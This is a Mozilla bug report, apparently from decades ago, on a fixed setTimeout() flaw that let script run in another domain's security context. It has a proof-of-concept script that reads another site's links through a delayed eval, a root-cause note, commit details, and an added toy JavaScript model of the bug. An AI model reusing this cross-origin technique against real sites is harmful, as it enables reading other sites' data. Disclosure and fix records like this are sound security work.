Closed Bug 16166 Opened 26 years ago Closed 26 years ago

setTimeout() security problem

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect

Tracking

VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

Details

The setTimeout() method allows executing JavaScript code in the security context of documents from any domain. The code is:
----------------------------------------------------------------------
<SCRIPT>
a=window.open("http://www.yahoo.com");
window.x="s='Here are some links: ';for(i=0;i< ( (document.links.length < 10) ? document.links.length : 10) ;i++) s += document.links[i].href +String.fromCharCode(10);alert(s);";
setTimeout("a.setTimeout('eval(opener.x)',1000);",10000);
</SCRIPT>
//opener.x may be circumvented
----------------------------------------------------------------------
Status: NEW → ASSIGNED
The principal for the timeout was being fetched from the window, not from the currently executing code.
Status: ASSIGNED → RESOLVED
Closed: 26 years ago
Resolution: --- → FIXED
Checking in dom/src/base/nsGlobalWindow.cpp;
/m/pub/mozilla/dom/src/base/nsGlobalWindow.cpp,v  <--  nsGlobalWindow.cpp
new revision: 1.157; previous revision: 1.156
done
Blocks: 16950
Verified fixed.
Status: RESOLVED → VERIFIED
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
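
Added example (not part of the original bug report and not Mozilla's code): a toy JavaScript model of the root cause stated above, in which a timer's principal is taken either from the target window (pre-fix) or from the code that called setTimeout() (post-fix). ToyWindow, toySetTimeout, readLinks, runTimers and demo are hypothetical names, and the origins are constructed.

```javascript
// Toy model of the bug's root cause. All names and origins are constructed.
class ToyWindow {
  constructor(origin, links) {
    this.origin = origin; // origin of the document loaded in this window
    this.links = links;   // stands in for document.links
    this.timers = [];     // pending timeouts: { principal, code }
  }
}

// principalSource "window": pre-fix, principal is taken from the target window.
// principalSource "caller": post-fix, principal is taken from the running code.
function toySetTimeout(targetWin, callerOrigin, code, principalSource) {
  const principal =
    principalSource === "window" ? targetWin.origin : callerOrigin;
  targetWin.timers.push({ principal, code });
}

// Same-origin check applied when timer code touches the document.
function readLinks(win, principal) {
  if (principal !== win.origin) {
    throw new Error(`access denied: ${principal} -> ${win.origin}`);
  }
  return win.links.slice();
}

// Fire every pending timer with the principal stored at scheduling time.
function runTimers(win) {
  return win.timers.splice(0).map(({ principal, code }) => {
    try {
      return { ok: true, value: code(win, principal) };
    } catch (e) {
      return { ok: false, error: e.message };
    }
  });
}

// A page on callerOrigin schedules code on a window showing targetOrigin.
function demo(principalSource, callerOrigin, targetOrigin) {
  const target = new ToyWindow(targetOrigin, [targetOrigin + "/a"]);
  toySetTimeout(target, callerOrigin, readLinks, principalSource);
  return runTimers(target)[0];
}

console.log(demo("window", "http://page.example", "http://other.example"));
console.log(demo("caller", "http://page.example", "http://other.example"));
```

In the "window" mode the cross-origin read succeeds because the timer inherits the target document's principal; in the "caller" mode the same read is denied, while a same-origin timer still works.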